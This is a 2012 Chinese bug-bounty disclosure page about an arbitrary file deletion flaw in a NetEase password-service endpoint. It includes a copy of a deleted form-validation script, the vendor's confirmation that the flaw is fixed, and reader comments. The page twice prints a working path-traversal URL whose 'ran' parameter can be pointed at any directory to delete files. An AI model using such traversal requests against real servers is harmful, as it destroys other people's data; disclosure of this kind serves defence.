2012-07-15: 细节已通知厂商并且等待厂商处理中 2012-07-16: 厂商已经确认,细节仅向厂商公开 2012-07-26: 细节向核心白帽子及相关领域专家公开 2012-08-05: 细节向普通白帽子公开 2012-08-15: 细节向实习白帽子公开 2012-08-29: 细节向公众公开
网易任何删除文件漏洞[严重]
漏洞地址:https://mima.163.com/nie/ts_game_upload_remove.aspx?again=&ran=../nie/images/ts/&id=topImg.jpg想删哪个换目录即可。。测试时删除了2个文件,已备份。Validator_nV2.js
String.prototype.trim = function() { return this.replace(/(^\s*)|(\s*$)/g, "");}Validator = { MimaIdCard : "this.IsMimaIdCard(value)", Pingma : "this.IsPingma(value)", Require : /.+/, // Email : /^\w+([-+.]\w+)*@\w+([-.]\w+)*\.\w+([-.]\w+)*$/, Email : "this.IsEmail(value)", Phone : /^((\(\d{2,3}\))|(\d{3}\-))?(\(0\d{2,3}\)|0\d{2,3}-)?[1-9]\d{6,7}(\-\d{1,4})?$/, Mobile : /^1[3458]\d{9}$/, Url : /^http:\/\/[A-Za-z0-9]+\.[A-Za-z0-9]+[\/=\?%\-&_~`@[\]\':+!]*([^<>\"\"])*$/, IdCard : "this.IsIdCard(value)", Currency : /^\d+(\.\d+)?$/, Number : /^\d+$/, Zip : /^[1-9]\d{5}$/, QQ : "this.IsQQ(value)", Integer : /^[-\+]?\d+$/, Double : /^[-\+]?\d+(\.\d+)?$/, English : /^[A-Za-z]+$/, Chinese : /^[\u0391-\uFFE5]+$/, Username : /^[a-z]\w{3,}$/i, UnSafe : /^(([A-Z]*|[a-z]*|\d*|[-_\~!@#\$%\^&\*\.\(\)\[\]\{\}<>\?\\\/\'\"]*)|.{0,5})$|\s/, IsSafe : function(str) { return !this.UnSafe.test(str); }, SafeString : "this.IsSafe(value)", Filter : "this.DoFilter(value, getAttribute('accept'))", Limit : "this.limit(value.length,getAttribute('min'), getAttribute('max'))", Limit2 : "this.limit2(value.length, getAttribute('min'), getAttribute('max'))", LimitB : "this.limit(this.LenB(value), getAttribute('min'), getAttribute('max'))", Date : "this.IsDate(value, getAttribute('min'), getAttribute('format'))", Repeat : "value == document.getElementsByName(getAttribute('to'))[0].value", Range : "getAttribute('min') < (value|0) && (value|0) < getAttribute('max')", Compare : "this.compare(value,getAttribute('operator'),getAttribute('to'))", Custom : "this.Exec(value, getAttribute('regexp'))", Group : "this.MustChecked(getAttribute('name'), getAttribute('min'), getAttribute('max'))", ErrorItem : [ document.forms[0] ], ErrorMessage : [ "以下原因导致提交失败:\t" ], Validate : function(theForm, mode) { var obj = theForm || event.srcElement; var count = obj.elements.length; this.ErrorMessage.length = 1; this.ErrorItem.length = 1; this.ErrorItem[0] = obj; for ( var i = 0; i < count; i++) { var breakFor = false; with (obj.elements[i]) { var j_show = true; try{ j_show = j("#"+obj.elements[i].id).is(":visible") }catch(e){ j_show = true; } if (obj.elements[i].style.display != 'none' && j_show) { var _tipId = obj.elements[i].getAttribute("tipId"); if (_tipId != null) { $(_tipId).style.display = 'none'; } var _dataType = getAttribute("dataType"); if (typeof (_dataType) == "object" || typeof (this[_dataType]) == "undefined") continue; if (getAttribute("require") == "false" && value.trim() == "") continue; switch (_dataType) { case "MimaIdCard": case "Pingma": case "IdCard": case "Email": case "QQ": case "Date": case "Repeat": case "Range": case "Compare": case "Custom": case "Group": case "Limit": case "Limit2": case "LimitB": case "SafeString": case "Filter": if (!eval(this[_dataType])) { this.AddError(i, getAttribute("msg")); breakFor = true; } break; default: if (!this[_dataType].test(value.trim())) { this.AddError(i, getAttribute("msg")); breakFor = true; } } } if (breakFor) break; } } if (this.ErrorMessage.length > 1) { mode = mode || 1; var errCount = this.ErrorItem.length; switch (mode) { /* ---------------------------------------- */ case 4: alert(this.ErrorMessage.join("\n")); try { this.ErrorItem[1].focus(); } catch (e) { } break; /* ---------------------------------------- */ case 5: for ( var i = 1; i < errCount; i++) { try { var _tipId = this.ErrorItem[i].getAttribute("tipId"); if (_tipId == null) { // this.ErrorItem[i].parentNode.style.backgroundColor // = "red"; } else { if ($(this.ErrorItem[i].getAttribute("tipId")).className == 'tips') { $(this.ErrorItem[i].getAttribute("tipId")).className = 'error_tips'; } else if ($(this.ErrorItem[i] .getAttribute("tipId")).className == 'tip4textarea') { $(this.ErrorItem[i].getAttribute("tipId")).className = 'error_tip4textarea'; } if (this.ErrorMessage[i] != "") { $(this.ErrorItem[i].getAttribute("tipId")).innerHTML = this.ErrorMessage[i] .replace(/\d+:/, ""); } if (this.ErrorItem[i].getAttribute("tipId") == 'tip2') { $(this.ErrorItem[i].getAttribute("tipId")).style.margin = '0px'; } $(this.ErrorItem[i].getAttribute("tipId")).style.display = 'block'; } } catch (e) { alert(e.description + " 5 "); } } if (this.ErrorItem[1].getAttribute("fId") == null) { // this.ErrorItem[1].focus(); } else { // alert(this.ErrorItem[1].getAttribute("fId")); // $(this.ErrorItem[1].getAttribute("fId")).focus(); } break; /* ---------------------------------------- */ default: for ( var i = 1; i < errCount; i++) { try { var _tipId = this.ErrorItem[i].getAttribute("tipId"); if (_tipId != null) { if ($(_tipId).className == 'xPro') { $(_tipId).className = 'xProerr'; $(_tipId).style.display = ""; $(_tipId).parentNode.parentNode.className = 'prompt'; } else if ($(this.ErrorItem[i] .getAttribute("tipId")).className == 'tip4textarea') { $(this.ErrorItem[i].getAttribute("tipId")).className = 'error_tip4textarea'; } } } catch (e) { alert(e.description + " 6 "); } } } return false; } return true; }, limit : function(len, min, max) { min = min || 0; max = max || Number.MAX_VALUE; return min <= len && len <= max; }, limit2 : function(len, min, max) { if (len == 0) return true; min = min || 0; max = max || Number.MAX_VALUE; return min <= len && len <= max; }, LenB : function(str) { return str.replace(/[^\x00-\xff]/g, "**").length; }, AddError : function(index, str) { this.ErrorItem[this.ErrorItem.length] = this.ErrorItem[0].elements[index]; this.ErrorMessage[this.ErrorMessage.length] = this.ErrorMessage.length + ":" + str; }, Exec : function(op, reg) { return new RegExp(reg, "g").test(op); }, compare : function(op1, operator, op2) { switch (operator) { case "NotEqual": return (op1 != op2); case "GreaterThan": return (op1 > op2); case "GreaterThanEqual": return (op1 >= op2); case "LessThan": return (op1 < op2); case "LessThanEqual": return (op1 <= op2); default: return (op1 == op2); } }, MustChecked : function(name, min, max) { var groups = document.getElementsByName(name); var hasChecked = 0; min = min || 1; max = max || groups.length; for ( var i = groups.length - 1; i >= 0; i--) if (groups[i].checked) hasChecked++; return min <= hasChecked && hasChecked <= max; }, DoFilter : function(input, filter) { return new RegExp("^.+\.(?=EXT)(EXT)$".replace(/EXT/g, filter.split( /\s*,\s*/).join("|")), "gi").test(input); }, IsQQ : function(number) { if (number.trim() == '') { return true; } return /^[1-9]\d{0,15}$/.test(number.trim()); }, IsMimaIdCard : function(number) { if (!number || number.trim() == '') { return false; } // 连续7个相同数字则不通过 // return !(/(.)\1{6}/.test(number.trim())); return true; }, IsPingma : function(number) { /* if (number || number != '') { return (/^[0-9a-zA-Z\\._]{6,16}$/.test(number)); } return true; */ number = number.trim(); if (number == '') { return true; }else{ min = 6; max = 16; return min <= number.length && number.length <= max; } }, IsEmail : function(value) { return (/^\w+([-+.]\w+)*@\w+([-.]\w+)*\.\w+([-.]\w+)*$/.test(value)); }, IsIdCard : function(number) { var date, Ai; var verify = "10x98765432"; var Wi = [ 7, 9, 10, 5, 8, 4, 2, 1, 6, 3, 7, 9, 10, 5, 8, 4, 2 ]; var area = [ '', '', '', '', '', '', '', '', '', '', '', '北京', '天津', '河北', '山西', '内蒙古', '', '', '', '', '', '辽宁', '吉林', '黑龙江', '', '', '', '', '', '', '', '上海', '江苏', '浙江', '安微', '福建', '江西', '山东', '', '', '', '河南', '湖北', '湖南', '广东', '广西', '海南', '', '', '', '重庆', '四川', '贵州', '云南', '西藏', '', '', '', '', '', '', '陕西', '甘肃', '青海', '宁夏', '新疆', '', '', '', '', '', '台湾', '', '', '', '', '', '', '', '', '', '香港', '澳门', '', '', '', '', '', '', '', '', '国外' ]; var re = number .match(/^(\d{2})\d{4}(((\d{2})(\d{2})(\d{2})(\d{3}))|((\d{4})(\d{2})(\d{2})(\d{3}[x\d])))$/i); if (re == null) return false; if (re[1] >= area.length || area[re[1]] == "") return false; if (re[2].length == 12) { Ai = number.substr(0, 17); date = [ re[9], re[10], re[11] ].join("-"); } else { Ai = number.substr(0, 6) + "19" + number.substr(6); date = [ "19" + re[4], re[5], re[6] ].join("-"); } if (!this.IsDate(date, "ymd")) return false; var sum = 0; for ( var i = 0; i <= 16; i++) { sum += Ai.charAt(i) * Wi[i]; } Ai += verify.charAt(sum % 11); return (number.length == 15 || number.length == 18 && number == Ai); }, IsDate : function(op, formatString) { formatString = formatString || "ymd"; var m, year, month, day; switch (formatString) { case "ymd": m = op.match(new RegExp( "^((\\d{4})|(\\d{2}))([-./])(\\d{1,2})\\4(\\d{1,2})$")); if (m == null) return false; day = m[6]; month = m[5] * 1; year = (m[2].length == 4) ? m[2] : GetFullYear(parseInt(m[3], 10)); break; case "dmy": m = op.match(new RegExp( "^(\\d{1,2})([-./])(\\d{1,2})\\2((\\d{4})|(\\d{2}))$")); if (m == null) return false; day = m[1]; month = m[3] * 1; year = (m[5].length == 4) ? m[5] : GetFullYear(parseInt(m[6], 10)); break; default: break; } if (!parseInt(month)) return false; month = month == 0 ? 12 : month; var date = new Date(year, month - 1, day); return (typeof (date) == "object" && year == date.getFullYear() && month == (date.getMonth() + 1) && day == date.getDate()); function GetFullYear(y) { return ((y < 30 ? "20" : "19") + y) | 0; } }}
一个图片:topImg.jpg
漏洞地址:https://mima.163.com/nie/ts_game_upload_remove.aspx?again=&ran=../nie/images/ts/&id=topImg.jpg
你们懂。
危害等级:高
漏洞Rank:10
确认时间:2012-07-16 17:20
感谢您对网易的关注,漏洞已修复。
暂无
以后要再标题前加:【精华】
+1
这个厉害
删谁的?
@鬼哥 建议标题改为网易任意文件删除漏洞
求详情
@凤凰 对头。任意文件这个描述更好。差点把这位凤凰误认为凤凰网···
@凤凰 写错字了。本来是想这样写的。
说真的。。测试的时候真没想过去备份。。洞主v5